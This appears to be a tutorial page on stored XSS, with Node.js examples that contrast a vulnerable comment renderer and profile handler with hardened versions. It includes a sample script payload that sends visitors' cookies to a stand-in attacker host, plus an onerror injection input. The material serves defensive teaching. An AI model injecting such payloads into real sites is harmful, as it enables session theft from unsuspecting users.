Stored XSS


Last updated 2 years ago

As the name implies, the XSS payload is stored by the web application (in a database, for example) and is executed later in the browser of every user who visits the page that renders it.

Example Scenario

Consider a blog that allows users to post comments. Unfortunately, these comments are neither validated on input nor encoded on output. If we post a comment containing JavaScript, it is stored in the database, and every other user who later visits the article has that JavaScript run in their browser.

Impact

The malicious JavaScript could redirect users to another site, steal the user's session cookie (unless it is marked HttpOnly), or perform actions on the website while acting as the visiting user, since requests issued by the injected script carry that user's session.
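To make the comment scenario concrete, here is an added example (not code from the original page) of a minimal in-memory comment store rendered two ways: once by concatenating stored strings straight into HTML, which is the stored XSS bug, and once through contextual HTML output encoding, which turns the same payload into inert text. The function names, the sample comments and the attacker host `attacker.example` are all constructed for illustration; the script runs under Node.js with no dependencies.

```javascript
// Added example (not the page's own code): stored XSS in a comment feature,
// vulnerable rendering beside its hardened form. All names are hypothetical.

// In-memory stand-in for the blog's "comments" table.
const comments = [];

function postComment(author, body) {
  // No validation or sanitisation: whatever the user sends is persisted as-is.
  comments.push({ author, body });
}

// Vulnerable rendering: user-controlled strings are concatenated directly into
// HTML, so a stored <script> (or an onerror handler) becomes live markup for
// every visitor who loads the article.
function renderCommentsUnsafe() {
  return comments
    .map((c) => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join('\n');
}

// Contextual output encoding for the HTML element context. Every character
// that can open a tag, close an attribute or start an entity is replaced, so
// the browser displays the payload as text instead of executing it.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[ch]);
}

// Hardened rendering: same template, but every stored value is encoded
// for the context it lands in.
function renderCommentsSafe() {
  return comments
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('\n');
}

// Constructed sample traffic: one benign comment, one payload that would send
// the visitor's cookie to a hypothetical attacker-controlled host.
postComment('alice', 'Nice write-up!');
postComment(
  'mallory',
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
);

console.log('--- unsafe: payload is live markup ---');
console.log(renderCommentsUnsafe());
console.log('--- safe: payload is inert text ---');
console.log(renderCommentsSafe());
```

Encoding on output, at the point where the value is written into the page, is the fix; stripping `<script>` on input is not, because the same stored value may later be rendered in an attribute or JavaScript context where a different encoding is needed.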

How to test for Stored XSS

Look for any input that the application persists and later displays to other users, for example:

  • Comments on a blog

  • User profile information (display name, bio, address)

  • Website listings (product names, descriptions, reviews)

Sometimes developers assume that restricting input values on the client side is sufficient protection. Submitting values the web application does not expect is therefore a good way to discover stored XSS.

For example, an age field may only accept an integer chosen from a dropdown menu. Instead of using the form, send the request manually (with an intercepting proxy or curl), which lets you put arbitrary payloads in that field. If the server stores the value without re-validating it, the payload is rendered wherever the profile is shown.
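The dropdown bypass above, as an added example (not code from the original page): the form body is built by hand, the way a proxy or curl would send it, and a profile handler that trusts the client-side restriction is compared with one that re-validates the value server-side. The handler names, the field names and the sample bodies are constructed for illustration; the script runs under Node.js with no dependencies.

```javascript
// Added example (not the page's own code): bypassing a client-side dropdown
// restriction on an "age" field, vulnerable handler beside its hardened form.
// All names are hypothetical.

// Constructed form bodies: what the dropdown would send, and what an attacker
// sends by crafting the POST body directly instead of using the form.
const legitimateBody = new URLSearchParams({ username: 'bob', age: '34' }).toString();
const maliciousBody = new URLSearchParams({
  username: 'bob',
  age: '<img src=x onerror="alert(document.domain)">',
}).toString();

// Parse an application/x-www-form-urlencoded body the way a web framework would.
function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Vulnerable: assumes the dropdown guaranteed an integer and stores the raw
// value. The payload is persisted and will fire wherever the profile renders.
function updateProfileUnsafe(profiles, body) {
  const form = parseForm(body);
  profiles[form.username] = { age: form.age };
  return { ok: true, stored: profiles[form.username].age };
}

// Hardened: re-validate on the server with a strict allow-list. Only an
// ASCII integer of up to three digits within a plausible range is accepted;
// anything else is rejected before it reaches the database.
function parseAge(raw) {
  if (typeof raw !== 'string' || !/^\d{1,3}$/.test(raw)) return null;
  const n = Number(raw);
  return n >= 0 && n <= 150 ? n : null;
}

function updateProfileSafe(profiles, body) {
  const form = parseForm(body);
  const age = parseAge(form.age);
  if (age === null) {
    return { ok: false, error: 'age must be an integer between 0 and 150' };
  }
  profiles[form.username] = { age };
  return { ok: true, stored: age };
}

// Run both handlers over both bodies to show the difference.
const unsafeStore = {};
const safeStore = {};
console.log('unsafe / legitimate:', updateProfileUnsafe(unsafeStore, legitimateBody));
console.log('unsafe / malicious :', updateProfileUnsafe(unsafeStore, maliciousBody));
console.log('safe   / legitimate:', updateProfileSafe(safeStore, legitimateBody));
console.log('safe   / malicious :', updateProfileSafe(safeStore, maliciousBody));
```

Server-side validation is a defence in depth here, not a replacement for output encoding: a field that legitimately accepts free text (a bio, a product description) cannot be allow-listed this tightly and still needs encoding when it is rendered.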